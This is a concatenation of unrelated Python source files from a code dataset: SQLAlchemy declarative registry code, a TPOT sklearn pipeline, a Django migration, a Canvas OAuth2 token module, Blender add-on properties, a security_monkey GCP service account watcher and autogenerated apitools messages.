from sqlalchemy.orm.decl_api import DeclarativeMeta
mapper_registry = registry()
class Base(metaclass=DeclarativeMeta):
__abstract__ = True
registry = mapper_registry
metadata = mapper_registry.metadata
The :meth:`_orm.registry.generate_base` method provides the
implementation for the :func:`_orm.declarative_base` function, which
creates the :class:`_orm.registry` and base class all at once.
See the section :ref:`orm_declarative_mapping` for background and
examples.
:param mapper:
An optional callable, defaults to :func:`~sqlalchemy.orm.mapper`.
This function is used to generate new :class:`_orm.Mapper` objects.
:param cls:
Defaults to :class:`object`. A type to use as the base for the
generated declarative base class. May be a class or tuple of classes.
:param name:
Defaults to ``Base``. The display name for the generated
class. Customizing this is not required, but can improve clarity in
tracebacks and debugging.
:param metaclass:
Defaults to :class:`.DeclarativeMeta`. A metaclass or __metaclass__
compatible callable to use as the meta type of the generated
declarative base class.
.. seealso::
:ref:`orm_declarative_mapping`
:func:`_orm.declarative_base`
"""
metadata = self.metadata
bases = not isinstance(cls, tuple) and (cls,) or cls
class_dict = dict(registry=self, metadata=metadata)
if isinstance(cls, type):
class_dict["__doc__"] = cls.__doc__
if self.constructor:
class_dict["__init__"] = self.constructor
class_dict["__abstract__"] = True
if mapper:
class_dict["__mapper_cls__"] = mapper
return metaclass(name, bases, class_dict)
def mapped(self, cls):
"""Class decorator that will apply the Declarative mapping process
to a given class.
E.g.::
from sqlalchemy.orm import registry
mapper_registry = registry()
@mapper_registry.mapped
class Foo:
__tablename__ = 'some_table'
id = Column(Integer, primary_key=True)
name = Column(String)
See the section :ref:`orm_declarative_mapping` for complete
details and examples.
:param cls: class to be mapped.
:return: the class that was passed.
.. seealso::
:ref:`orm_declarative_mapping`
:meth:`_orm.registry.generate_base` - generates a base class
that will apply Declarative mapping to subclasses automatically
using a Python metaclass.
"""
_as_declarative(self, cls, cls.__dict__)
return cls
def as_declarative_base(self, **kw):
"""
Class decorator which will invoke
:meth:`_orm.registry.generate_base`
for a given base class.
E.g.::
from sqlalchemy.orm import registry
mapper_registry = registry()
@mapper_registry.as_declarative_base()
class Base(object):
@declared_attr
def __tablename__(cls):
return cls.__name__.lower()
id = Column(Integer, primary_key=True)
class MyMappedClass(Base):
# ...
All keyword arguments passed to
:meth:`_orm.registry.as_declarative_base` are passed
along to :meth:`_orm.registry.generate_base`.
"""
def decorate(cls):
kw["cls"] = cls
kw["name"] = cls.__name__
return self.generate_base(**kw)
return decorate
def map_declaratively(self, cls):
"""Map a class declaratively.
In this form of mapping, the class is scanned for mapping information,
including for columns to be associated with a table, and/or an
actual table object.
Returns the :class:`_orm.Mapper` object.
E.g.::
from sqlalchemy.orm import registry
mapper_registry = registry()
class Foo:
__tablename__ = 'some_table'
id = Column(Integer, primary_key=True)
name = Column(String)
mapper = mapper_registry.map_declaratively(Foo)
This function is more conveniently invoked indirectly via either the
:meth:`_orm.registry.mapped` class decorator or by subclassing a
declarative metaclass generated from
:meth:`_orm.registry.generate_base`.
See the section :ref:`orm_declarative_mapping` for complete
details and examples.
:param cls: class to be mapped.
:return: a :class:`_orm.Mapper` object.
.. seealso::
:ref:`orm_declarative_mapping`
:meth:`_orm.registry.mapped` - more common decorator interface
to this function.
:meth:`_orm.registry.map_imperatively`
"""
return _as_declarative(self, cls, cls.__dict__)
def map_imperatively(self, class_, local_table=None, **kw):
r"""Map a class imperatively.
In this form of mapping, the class is not scanned for any mapping
information. Instead, all mapping constructs are passed as
arguments.
This method is intended to be fully equivalent to the classic
SQLAlchemy :func:`_orm.mapper` function, except that it's in terms of
a particular registry.
E.g.::
from sqlalchemy.orm import registry
mapper_registry = registry()
my_table = Table(
"my_table",
mapper_registry.metadata,
Column('id', Integer, primary_key=True)
)
class MyClass:
pass
mapper_registry.map_imperatively(MyClass, my_table)
See the section :ref:`orm_imperative_mapping` for complete background
and usage examples.
:param class\_: The class to be mapped. Corresponds to the
:paramref:`_orm.mapper.class_` parameter.
:param local_table: the :class:`_schema.Table` or other
:class:`_sql.FromClause` object that is the subject of the mapping.
Corresponds to the
:paramref:`_orm.mapper.local_table` parameter.
:param \**kw: all other keyword arguments are passed to the
:func:`_orm.mapper` function directly.
.. seealso::
:ref:`orm_imperative_mapping`
:ref:`orm_declarative_mapping`
"""
return _mapper(self, class_, local_table, kw)
mapperlib._legacy_registry = registry()
@util.deprecated_params(
    bind=(
        "2.0",
        "The ``bind`` argument to as_declarative is "
        "deprecated and will be removed in SQLAlchemy 2.0.",
    )
)
def as_declarative(**kw):
    """
    Class decorator which will adapt a given class into a
    :func:`_orm.declarative_base`.

    This function makes use of the :meth:`_orm.registry.as_declarative_base`
    method, by first creating a :class:`_orm.registry` automatically
    and then invoking the decorator.

    E.g.::

        from sqlalchemy.orm import as_declarative

        @as_declarative()
        class Base(object):
            @declared_attr
            def __tablename__(cls):
                return cls.__name__.lower()
            id = Column(Integer, primary_key=True)

        class MyMappedClass(Base):
            # ...

    .. seealso::

        :meth:`_orm.registry.as_declarative_base`

    """
    # Pop the registry-level arguments; whatever remains in ``kw``
    # (e.g. ``cls``, ``name``, ``metaclass``) is forwarded on to
    # registry.as_declarative_base().
    bind, metadata, class_registry = (
        kw.pop("bind", None),
        kw.pop("metadata", None),
        kw.pop("class_registry", None),
    )

    return registry(
        _bind=bind, metadata=metadata, class_registry=class_registry
    ).as_declarative_base(**kw)
@inspection._inspects(DeclarativeMeta)
def _inspect_decl_meta(cls):
    """Inspection hook for declarative classes.

    Returns the class's :class:`_orm.Mapper`; when the mapping is deferred
    and not yet configured, raises an informative ``UnmappedClassError``
    instead of returning ``None``.
    """
    mp = _inspect_mapped_class(cls)
    if mp is None:
        if _DeferredMapperConfig.has_cls(cls):
            # raise_unmapped_for_cls may itself raise with more detail; the
            # explicit raise below is the fallback message.
            _DeferredMapperConfig.raise_unmapped_for_cls(cls)
            raise orm_exc.UnmappedClassError(
                cls,
                msg="Class %s has a deferred mapping on it. It is not yet "
                "usable as a mapped class." % orm_exc._safe_cls_name(cls),
            )
    return mp
| 33.435824 | 97 | 0.638267 |
198d1773cc21415f07df955ad0ea159d17bbf1e1 | 905 | py | Python | KaggleTitanic/models/model_2017_09_18_04_25_37-0.8608.py | deo1/deo1 | 36671f12269d3bd662d746e8b9f66c22255c9df7 | [
"MIT"
] | null | null | null | KaggleTitanic/models/model_2017_09_18_04_25_37-0.8608.py | deo1/deo1 | 36671f12269d3bd662d746e8b9f66c22255c9df7 | [
"MIT"
] | null | null | null | KaggleTitanic/models/model_2017_09_18_04_25_37-0.8608.py | deo1/deo1 | 36671f12269d3bd662d746e8b9f66c22255c9df7 | [
"MIT"
] | null | null | null | import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import MinMaxScaler, PolynomialFeatures
from sklearn.svm import LinearSVC
# NOTE: Make sure that the class is labeled 'class' in the data file
tpot_data = np.recfromcsv('PATH/TO/DATA/FILE', delimiter='COLUMN_SEPARATOR', dtype=np.float64)
features = np.delete(tpot_data.view(np.float64).reshape(tpot_data.size, -1), tpot_data.dtype.names.index('class'), axis=1)
training_features, testing_features, training_target, testing_target = \
train_test_split(features, tpot_data['class'], random_state=42)
exported_pipeline = make_pipeline(
MinMaxScaler(),
PolynomialFeatures(include_bias=False),
LinearSVC(C=10.0, dual=True, tol=1e-05)
)
exported_pipeline.fit(training_features, training_target)
results = exported_pipeline.predict(testing_features)
| 41.136364 | 122 | 0.80221 |
b877a97805f2f2cdc1ce21de78dd56a619e6ff06 | 615 | py | Python | blog/migrations/0012_chart.py | ndavilo/BitBlog | ec6e623b04688ec0b587f6392c4fccd09f77a481 | [
"MIT"
] | null | null | null | blog/migrations/0012_chart.py | ndavilo/BitBlog | ec6e623b04688ec0b587f6392c4fccd09f77a481 | [
"MIT"
] | null | null | null | blog/migrations/0012_chart.py | ndavilo/BitBlog | ec6e623b04688ec0b587f6392c4fccd09f77a481 | [
"MIT"
] | null | null | null | # Generated by Django 4.0 on 2022-02-04 11:39
from django.db import migrations, models
class Migration(migrations.Migration):
    """Create the ``Chart`` model: simple (name, value, timestamp) data
    points for charting."""

    dependencies = [
        ('blog', '0011_comment'),
    ]

    operations = [
        migrations.CreateModel(
            name='Chart',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50)),
                ('value', models.FloatField()),
                # auto_now: refreshed on every save, not only at creation
                ('date_time', models.DateTimeField(auto_now=True)),
            ],
        ),
    ]
021c1ff92a1f96840957ba28f0ea9b29f07ba938 | 6,193 | py | Python | canvas_oauth/oauth.py | suchermon/django-canvas-oauth2 | a1dcb3fee7681c7c0a892a999f7dbc56acebaeb1 | [
"MIT"
] | null | null | null | canvas_oauth/oauth.py | suchermon/django-canvas-oauth2 | a1dcb3fee7681c7c0a892a999f7dbc56acebaeb1 | [
"MIT"
] | null | null | null | canvas_oauth/oauth.py | suchermon/django-canvas-oauth2 | a1dcb3fee7681c7c0a892a999f7dbc56acebaeb1 | [
"MIT"
] | null | null | null | import logging
from django.urls import reverse
from django.http.response import HttpResponse, HttpResponseRedirect
from django.shortcuts import redirect
from django.template import loader
from django.template.exceptions import TemplateDoesNotExist
from django.utils.crypto import get_random_string
from canvas_oauth import (canvas, settings)
from canvas_oauth.models import CanvasOAuth2Token
from canvas_oauth.exceptions import (
MissingTokenError, InvalidOAuthStateError)
logger = logging.getLogger(__name__)
def get_oauth_token(request):
    """Retrieve a stored Canvas OAuth2 access token from Canvas for the
    currently logged in user. If the token has expired (or has exceeded an
    expiration threshold as defined by the consuming project), a fresh token
    is generated via the saved refresh token.

    If the user does not have a stored token, the method raises a
    MissingTokenError exception. If this happens inside a view, this exception
    will be handled by the middleware component of this library with a call to
    handle_missing_token. If this happens outside of a view, then the user must
    be directed by other means to the Canvas site in order to authorize a token.
    """
    try:
        # reverse one-to-one relation from the user model to CanvasOAuth2Token
        oauth_token = request.user.canvas_oauth2_token
        logger.info("Token found for user %s" % request.user.pk)
    except CanvasOAuth2Token.DoesNotExist:
        """ If this exception is raised by a view function and not caught,
        it is probably because the oauth_middleware is not installed, since it
        is supposed to catch this error."""
        logger.info("No token found for user %s" % request.user.pk)
        raise MissingTokenError("No token found for user %s" % request.user.pk)

    # Check to see if we're within the expiration threshold of the access
    # token; if so, swap it for a fresh one via the saved refresh token.
    if oauth_token.expires_within(settings.CANVAS_OAUTH_TOKEN_EXPIRATION_BUFFER):
        logger.info("Refreshing token for user %s" % request.user.pk)
        oauth_token = refresh_oauth_token(request)

    return oauth_token.access_token
def handle_missing_token(request):
    """Begin the Canvas OAuth2 authorization flow for this user.

    Stashes three values in the session for the callback view to use, then
    redirects the browser to the Canvas authorization endpoint:

    * ``canvas_oauth_initial_uri`` -- where to send the user afterwards,
    * ``canvas_oauth_request_state`` -- anti-CSRF state echoed by Canvas,
    * ``canvas_oauth_redirect_uri`` -- must match on the token POST.

    Returns an HttpResponseRedirect to Canvas.
    """
    # Store where the user came from so they can be redirected back there
    # at the end. https://canvas.instructure.com/doc/api/file.oauth.html
    request.session["canvas_oauth_initial_uri"] = request.get_full_path()

    # The request state is a recommended security check on the callback, so
    # store in session for later.
    # BUGFIX: Django 3.1 deprecated and Django 4.0 removed calling
    # get_random_string() without an explicit length; pass one (the old
    # implicit default was 12 -- 32 gives more entropy at no cost).
    oauth_request_state = get_random_string(32)
    request.session["canvas_oauth_request_state"] = oauth_request_state

    # The return URI is required to be the same when POSTing to generate
    # a token on callback, so also store it in session (although it could
    # be regenerated again via the same method call).
    oauth_redirect_uri = request.build_absolute_uri(reverse('canvas-oauth-callback'))
    request.session["canvas_oauth_redirect_uri"] = oauth_redirect_uri

    authorize_url = canvas.get_oauth_login_url(
        settings.CANVAS_OAUTH_CLIENT_ID,
        redirect_uri=oauth_redirect_uri,
        state=oauth_request_state,
        scopes=settings.CANVAS_OAUTH_SCOPES
    )
    logger.info("Redirecting user to %s" % authorize_url)
    return HttpResponseRedirect(authorize_url)
def oauth_callback(request):
    """Handle the redirect back from Canvas after authorization.

    Validates the anti-CSRF ``state``, exchanges the authorization code for
    an access/refresh token pair, persists it, and redirects the user to the
    page they started from.
    """
    error = request.GET.get('error')
    error_description = request.GET.get('error_description')
    if error:
        return render_oauth_error(error, error_description)

    code = request.GET.get('code')
    state = request.GET.get('state')
    # BUGFIX: indexing the session raised a bare KeyError when the session
    # had expired or the callback was hit directly; treat a missing session
    # state as invalid too (a plain .get() comparison would let
    # None == None slip through).
    session_state = request.session.get('canvas_oauth_request_state')
    if not session_state or state != session_state:
        logger.warning("OAuth state mismatch for request: %s" % request.get_full_path())
        raise InvalidOAuthStateError("OAuth state mismatch!")

    # Make the `authorization_code` grant type request to retrieve an
    # access token (plus its expiry and a refresh token).
    access_token, expires, refresh_token = canvas.get_access_token(
        grant_type='authorization_code',
        client_id=settings.CANVAS_OAUTH_CLIENT_ID,
        client_secret=settings.CANVAS_OAUTH_CLIENT_SECRET,
        redirect_uri=request.session["canvas_oauth_redirect_uri"],
        code=code)

    # NOTE(review): canvas_oauth2_token looks like a one-to-one relation, so
    # a second authorization by the same user would make this create() raise
    # an integrity error -- confirm whether update_or_create is wanted here.
    obj = CanvasOAuth2Token.objects.create(
        user=request.user,
        access_token=access_token,
        expires=expires,
        refresh_token=refresh_token)
    logger.info("CanvasOAuth2Token instance created: %s" % obj.pk)

    initial_uri = request.session['canvas_oauth_initial_uri']
    logger.info("Redirecting user back to initial uri %s" % initial_uri)
    return redirect(initial_uri)
def refresh_oauth_token(request):
    """Refresh the user's Canvas access token via the refresh_token grant.

    Writes the new access token and expiry onto the stored token model,
    saves it, and returns the saved model instance.
    """
    token = request.user.canvas_oauth2_token
    callback_uri = request.build_absolute_uri(reverse('canvas-oauth-callback'))

    # Perform the refresh_token grant; the refresh token itself is reused,
    # so the third tuple element is discarded.
    access_token, expires, _ = canvas.get_access_token(
        grant_type='refresh_token',
        client_id=settings.CANVAS_OAUTH_CLIENT_ID,
        client_secret=settings.CANVAS_OAUTH_CLIENT_SECRET,
        redirect_uri=callback_uri,
        refresh_token=token.refresh_token)

    # Persist the fresh token and expiration before returning.
    token.access_token = access_token
    token.expires = expires
    token.save()
    return token
def render_oauth_error(error, message):
    """Render an OAuth callback error as a 403 response.

    Uses the project's CANVAS_OAUTH_ERROR_TEMPLATE when it exists; falls
    back to a bare-bones text body when the template is missing.
    """
    logger.error("OAuth error %s" % error)
    context = {'error': error, 'message': message}
    try:
        body = loader.render_to_string(
            settings.CANVAS_OAUTH_ERROR_TEMPLATE, context)
    except TemplateDoesNotExist:
        body = "Error: %s" % error
    return HttpResponse(body, status=403)
| 41.286667 | 88 | 0.731955 |
00478460107fcadc81f1721c53e7f4ecedc617cd | 107 | py | Python | nrgmodbus/ipackaccess/__init__.py | nrgpy/nrgmodbus | 8932c527c30113933bba71c2f0f99e81966865ad | [
"MIT"
] | null | null | null | nrgmodbus/ipackaccess/__init__.py | nrgpy/nrgmodbus | 8932c527c30113933bba71c2f0f99e81966865ad | [
"MIT"
] | null | null | null | nrgmodbus/ipackaccess/__init__.py | nrgpy/nrgmodbus | 8932c527c30113933bba71c2f0f99e81966865ad | [
"MIT"
] | null | null | null | __name__ = "ipackaccess"
from .ipackaccess import ipackaccess
from .registers import ipackaccess_registers
| 26.75 | 44 | 0.850467 |
680892e5b3364903267316816aa253b6292a7efe | 6,979 | py | Python | src/properties.py | mika-f/Blender-TextMeshCreator | 19367cc8f711518b9fb3df8cc19735a52458a465 | [
"BlueOak-1.0.0",
"Apache-2.0",
"MIT"
] | null | null | null | src/properties.py | mika-f/Blender-TextMeshCreator | 19367cc8f711518b9fb3df8cc19735a52458a465 | [
"BlueOak-1.0.0",
"Apache-2.0",
"MIT"
] | null | null | null | src/properties.py | mika-f/Blender-TextMeshCreator | 19367cc8f711518b9fb3df8cc19735a52458a465 | [
"BlueOak-1.0.0",
"Apache-2.0",
"MIT"
] | null | null | null | # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# Copyright (c) Natsuneko. All rights reserved.
# Licensed under the License Zero Parity 7.0.0 (see LICENSE-PARITY file) and MIT (contributions, see LICENSE-MIT file) with exception License Zero Patron 1.0.0 (see LICENSE-PATRON file)
# -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
from bpy.props import BoolProperty, EnumProperty, FloatProperty, IntProperty, StringProperty
from bpy.types import PropertyGroup
class TextMeshCreatorProperties(PropertyGroup):
    """Add-on settings for Text Mesh Creator (a Blender PropertyGroup).

    Each annotated attribute below registers a UI property with Blender; the
    keyword arguments (default, name, description, options) are the
    registration contract consumed by the add-on's operators and panels.
    """

    # Dynamic enum-items callbacks: each tuple is (identifier, UI label,
    # tooltip) as required by bpy.props.EnumProperty.
    def separator_items(self, context):
        """Items callback for the 'Separate By' enum."""
        return [
            ("SPACE", "Space", "Separate Strings by Space"),
            ("TAB", "Tab", "Separate Strings by Tab"),
            ("CHARACTER", "Character", "Separate Strings by Character"),
            ("NONE", "None", "Do not separate"),
        ]

    def align_x(self, context):
        """Items callback for horizontal paragraph alignment."""
        # NOTE(review): the "Justify" tooltip has a stray leading space;
        # left byte-identical here since these strings are user-visible.
        return [
            ("LEFT", "Left", "Align text to the left"),
            ("CENTER", "Center", "Center text"),
            ("RIGHT", "Right", "Align text to the right"),
            ("JUSTIFY", "Justify", " Align to the left and the right"),
            ("FLUSH", "Flush", "Align to the left and the right, with equal character spacing")
        ]

    def align_y(self, context):
        """Items callback for vertical paragraph alignment."""
        return [
            ("TOP_BASELINE", "Top Baseline", "Align to top but use the base-line of the text"),
            ("TOP", "Top", "Align text to the top"),
            ("CENTER", "Center", "Align text to the middle"),
            ("BOTTOM", "Bottom", "Align text to the bottom"),
            ("BOTTOM_BASELINE", "Bottom Baseline", "Align text to the bottom but use the base-line of the text"),
        ]

    # generic
    # NOTE(review): integer defaults (default=3, default=0) combined with a
    # dynamic `items` callback -- confirm the targeted Blender version
    # accepts integer defaults for callback-based EnumProperty.
    strings: StringProperty(default="", name="Strings", description="Strings to be generated", options={"HIDDEN"})
    rotation_x: FloatProperty(default=90.0, name="Rotation X", description="Rotation X for Text", options={"HIDDEN"})
    rotation_y: FloatProperty(default=0.0, name="Rotation Y", description="Rotation Y for Text", options={"HIDDEN"})
    rotation_z: FloatProperty(default=180.0, name="Rotation Z", description="Rotation Z for Text", options={"HIDDEN"})
    scale_x: FloatProperty(default=1.0, name="Scale X", description="Scales X for Text", options={"HIDDEN"})
    scale_y: FloatProperty(default=1.0, name="Scale Y", description="Scales Y for Text", options={"HIDDEN"})
    scale_z: FloatProperty(default=1.0, name="Scale Z", description="Scales Z for Text", options={"HIDDEN"})
    font_path: StringProperty(default="", name="Font", description="Font used for mesh generation",
                              subtype="FILE_PATH", options={"HIDDEN"})
    separate_by: EnumProperty(default=3, items=separator_items, name="Separate By",
                              description="How to separate strings", options={"HIDDEN"})

    # text layout
    size: FloatProperty(default=1.0, name="Size", description="Font Size of mesh to be generated", options={"HIDDEN"})
    thickness: FloatProperty(default=0.1, name="Thickness",
                             description="Thickness of mesh to be generated", options={"HIDDEN"})
    horizontal_alignment: EnumProperty(default=0, items=align_x, name="Horizontal Alignment",
                                       description="Horizontal Alignment for Paragraph", options={"HIDDEN"})
    vertical_alignment: EnumProperty(default=0, items=align_y, name="Vertical Alignment",
                                     description="Vertical Alignment for Paragraph", options={"HIDDEN"})
    character_spacing: FloatProperty(default=1.2, name="Character Spacing",
                                     description="Spaces between characters (ignored for separated by character)", options={"HIDDEN"})
    word_spacing: FloatProperty(default=0.2, name="Word Spacing",
                                description="Space between words (ignored for separated by character or tab)", options={"HIDDEN"})

    # blendshape
    # Min/max offsets define the travel range driven by the blendshape keys.
    use_blendshape: BoolProperty(default=False, name="Use Blendshape",
                                 description="Move characters with Blendshapes", options={"HIDDEN"})
    blendshape_min_x: FloatProperty(default=0.0, name="Blendshape Move Min X",
                                    description="Blendshape offsets for moving to X", options={"HIDDEN"})
    blendshape_max_x: FloatProperty(default=0.0, name="Blendshape Move Max X",
                                    description="Blendshape offsets for moving to X", options={"HIDDEN"})
    blendshape_min_y: FloatProperty(default=0.0, name="Blendshape Move Min Y",
                                    description="Blendshape offsets for moving to Y", options={"HIDDEN"})
    blendshape_max_y: FloatProperty(default=0.0, name="Blendshape Move Max Y",
                                    description="Blendshape offsets for moving to Y", options={"HIDDEN"})
    blendshape_min_z: FloatProperty(default=0.0, name="Blendshape Move Min Z",
                                    description="Blendshape offsets for moving to Z", options={"HIDDEN"})
    blendshape_max_z: FloatProperty(default=0.0, name="Blendshape Move Max Z",
                                    description="Blendshape offsets for moving to Z", options={"HIDDEN"})

    # mesh
    use_decimate: BoolProperty(default=False, name="Use Decimate",
                               description="Set to True if using mesh decimate", options={"HIDDEN"})
    decimate_ratio: FloatProperty(default=0.5, name="Decimate Ratio", description="Decimate Ratio", options={"HIDDEN"})
    separate_by_loose_parts: BoolProperty(default=True, name="Separate by Loose Parts",
                                          description="Separate character by loose parts", options={"HIDDEN"})
    center_to_origin: BoolProperty(default=False, name="Center to Origin",
                                   description="Set to True if want to center of the text to be the origin", options={"HIDDEN"})

    # export
    is_preview: BoolProperty(default=False, name="Enable Preview Mode",
                             description="Set to True if want to check the generation result according to the set value", options={"HIDDEN"})
    inline_fbx: BoolProperty(default=False, name="Export as inline FBX",
                             description="Set to True if export multiple separated character(s) as single FBX", options={"HIDDEN"})
    increment_from: IntProperty(default=0, name="Increment From",
                                description="Offset value of serial number for output file", options={"HIDDEN"})
    export_path: StringProperty(default="", name="Export Directory",
                                description="Export FBX to", subtype="DIR_PATH", options={"HIDDEN"})
| 71.214286 | 187 | 0.598796 |
9b83704ac17319fad3e4871cbf37f1c3d55c7684 | 3,679 | py | Python | security_monkey/watchers/gcp/iam/serviceaccount.py | bungoume/security_monkey | 90c02638a315c78535869ab71a8859d17e011a6a | [
"Apache-2.0"
] | null | null | null | security_monkey/watchers/gcp/iam/serviceaccount.py | bungoume/security_monkey | 90c02638a315c78535869ab71a8859d17e011a6a | [
"Apache-2.0"
] | null | null | null | security_monkey/watchers/gcp/iam/serviceaccount.py | bungoume/security_monkey | 90c02638a315c78535869ab71a8859d17e011a6a | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. module: security_monkey.watchers.gcp.iam.serviceaccount
:platform: Unix
.. version:: $$VERSION$$
.. moduleauthor:: Tom Melendez <supertom@google.com> @supertom
"""
from security_monkey.common.gcp.util import get_gcp_project_creds, get_user_agent, gcp_resource_id_builder
from security_monkey.watcher import Watcher
from security_monkey.watcher import ChangeItem
from cloudaux.gcp.decorators import iter_project
from cloudaux.gcp.iam import list_serviceaccounts
from cloudaux.orchestration.gcp.iam.serviceaccount import get_serviceaccount_complete
class IAMServiceAccount(Watcher):
    """Watcher that snapshots GCP IAM service accounts for change tracking."""

    # Registry metadata used by the security_monkey framework/UI.
    index = 'iamserviceaccount'
    i_am_singular = 'IAMServiceAccount'
    i_am_plural = 'IAMServiceAccounts'
    account_type = 'GCP'

    def __init__(self, accounts=None, debug=False):
        super(IAMServiceAccount, self).__init__(accounts=accounts, debug=debug)
        # 'Etag' changes on every read of the IAM policy, so mark it
        # ephemeral to avoid recording spurious diffs.
        self.honor_ephemerals = True
        self.ephemeral_paths = [
            "Etag",
        ]
        self.user_agent = get_user_agent()

    def slurp(self):
        """
        :returns: item_list - list of IAMServiceAccounts.
        :returns: exception _map - A dict where the keys are a tuple containing the
            location of the exception and the value is the actual exception
        """
        self.prep_for_slurp()
        project_creds = get_gcp_project_creds(self.accounts)

        # iter_project calls slurp_items once per project, injecting the
        # project/credential kwargs and collecting an exception_map; the
        # closure below must therefore accept **kwargs and pass them through.
        @iter_project(projects=project_creds)
        def slurp_items(**kwargs):
            item_list = []
            kwargs['user_agent'] = self.user_agent
            service_accounts = list_serviceaccounts(**kwargs)
            for service_account in service_accounts:
                resource_id = gcp_resource_id_builder(
                    'projects.serviceaccounts.get', service_account['name'])
                # Fetch the full account (policy, keys, ...) by name.
                sa = get_serviceaccount_complete(
                    service_account=service_account['name'], **kwargs)
                # Only the key *count* is recorded, not key material.
                key_count = 0
                if 'Keys' in sa:
                    key_count = len(sa['Keys'])
                item_list.append(
                    IAMServiceAccountItem(
                        region='global',
                        account=sa['ProjectId'],
                        name=sa['DisplayName'],
                        arn=resource_id,
                        config={
                            'policy': sa.get('Policy', None),
                            'email': sa['Email'],
                            'keys': key_count,
                        }))
            return item_list, kwargs.get('exception_map', {})
        return slurp_items()
class IAMServiceAccountItem(ChangeItem):
    """Change-tracking item representing one GCP IAM service account."""

    def __init__(self,
                 region=None,
                 account=None,
                 name=None,
                 arn=None,
                 config=None):
        # Normalize a missing config to a fresh dict (never share a mutable
        # default between instances).
        effective_config = {} if config is None else config
        super(IAMServiceAccountItem, self).__init__(
            index=IAMServiceAccount.index,
            region=region,
            account=account,
            name=name,
            arn=arn,
            new_config=effective_config)
| 35.375 | 106 | 0.604784 |
f91da3958072fff255b3d83b8ec747d845cc01c3 | 62,109 | py | Python | lib/googlecloudsdk/third_party/apis/runapps/v1alpha1/runapps_v1alpha1_messages.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | 2 | 2019-11-10T09:17:07.000Z | 2019-12-18T13:44:08.000Z | lib/googlecloudsdk/third_party/apis/runapps/v1alpha1/runapps_v1alpha1_messages.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | null | null | null | lib/googlecloudsdk/third_party/apis/runapps/v1alpha1/runapps_v1alpha1_messages.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | 1 | 2020-07-25T01:40:19.000Z | 2020-07-25T01:40:19.000Z | """Generated message classes for runapps version v1alpha1.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from __future__ import absolute_import
from apitools.base.protorpclite import messages as _messages
from apitools.base.py import encoding
from apitools.base.py import extra_types
package = 'runapps'
# NOTE(review): autogenerated apitools message (see file header) -- the
# integer arguments to *Field() are wire-format tags; regenerate from the
# discovery document rather than hand-editing. The docstring's "Next tag: 8"
# is stale: nine fields (tags 1-9) are defined below.
class Application(_messages.Message):
  r"""Message describing Application object Next tag: 8

  Messages:
    AnnotationsValue: Unstructured key value map that may be set by external
      tools to store and arbitrary metadata. They are not queryable and should
      be preserved when modifying objects. This field follows Kubernetes
      annotations' namespacing, limits, and rules. More info:
      http://kubernetes.io/docs/user-guide/annotations
    LabelsValue: Labels as key value pairs

  Fields:
    annotations: Unstructured key value map that may be set by external tools
      to store and arbitrary metadata. They are not queryable and should be
      preserved when modifying objects. This field follows Kubernetes
      annotations' namespacing, limits, and rules. More info:
      http://kubernetes.io/docs/user-guide/annotations
    config: The application configuration. On output, both intent repo and
      application config are populated. On input, only one can be modified at
      a time.
    createTime: Output only. Create time stamp
    deleteTime: Output only. For a deleted resource, the deletion time. It is
      only populated as a response to a Delete request.
    etag: Output only. A system-generated fingerprint for this version of the
      resource. May be used to detect modification conflict during updates.
    labels: Labels as key value pairs
    name: name of resource
    reconciling: Output only. Indicates whether the resource's reconciliation
      is still in progress.
    updateTime: Output only. Update time stamp
  """

  # Map-valued proto field rendered as a repeated key/value message.
  @encoding.MapUnrecognizedFields('additionalProperties')
  class AnnotationsValue(_messages.Message):
    r"""Unstructured key value map that may be set by external tools to store
    and arbitrary metadata. They are not queryable and should be preserved
    when modifying objects. This field follows Kubernetes annotations'
    namespacing, limits, and rules. More info: http://kubernetes.io/docs/user-
    guide/annotations

    Messages:
      AdditionalProperty: An additional property for a AnnotationsValue
        object.

    Fields:
      additionalProperties: Additional properties of type AnnotationsValue
    """

    class AdditionalProperty(_messages.Message):
      r"""An additional property for a AnnotationsValue object.

      Fields:
        key: Name of the additional property.
        value: A string attribute.
      """

      key = _messages.StringField(1)
      value = _messages.StringField(2)

    additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)

  # Map-valued proto field rendered as a repeated key/value message.
  @encoding.MapUnrecognizedFields('additionalProperties')
  class LabelsValue(_messages.Message):
    r"""Labels as key value pairs

    Messages:
      AdditionalProperty: An additional property for a LabelsValue object.

    Fields:
      additionalProperties: Additional properties of type LabelsValue
    """

    class AdditionalProperty(_messages.Message):
      r"""An additional property for a LabelsValue object.

      Fields:
        key: Name of the additional property.
        value: A string attribute.
      """

      key = _messages.StringField(1)
      value = _messages.StringField(2)

    additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)

  annotations = _messages.MessageField('AnnotationsValue', 1)
  config = _messages.MessageField('Config', 2)
  createTime = _messages.StringField(3)
  deleteTime = _messages.StringField(4)
  etag = _messages.StringField(5)
  labels = _messages.MessageField('LabelsValue', 6)
  name = _messages.StringField(7)
  reconciling = _messages.BooleanField(8)
  updateTime = _messages.StringField(9)
# Autogenerated apitools message; do not hand-edit (field numbers are wire tags).
class ApplicationStatus(_messages.Message):
  r"""Status of the application.

  Fields:
    modifyTime: Time at which the status was last updated.
    name: The resource name of the application status, in the following form:
      `projects/{project}/locations/{location}/applications/{name}/status`
    resource: Repeated field with status per resource.
  """

  modifyTime = _messages.StringField(1)
  name = _messages.StringField(2)
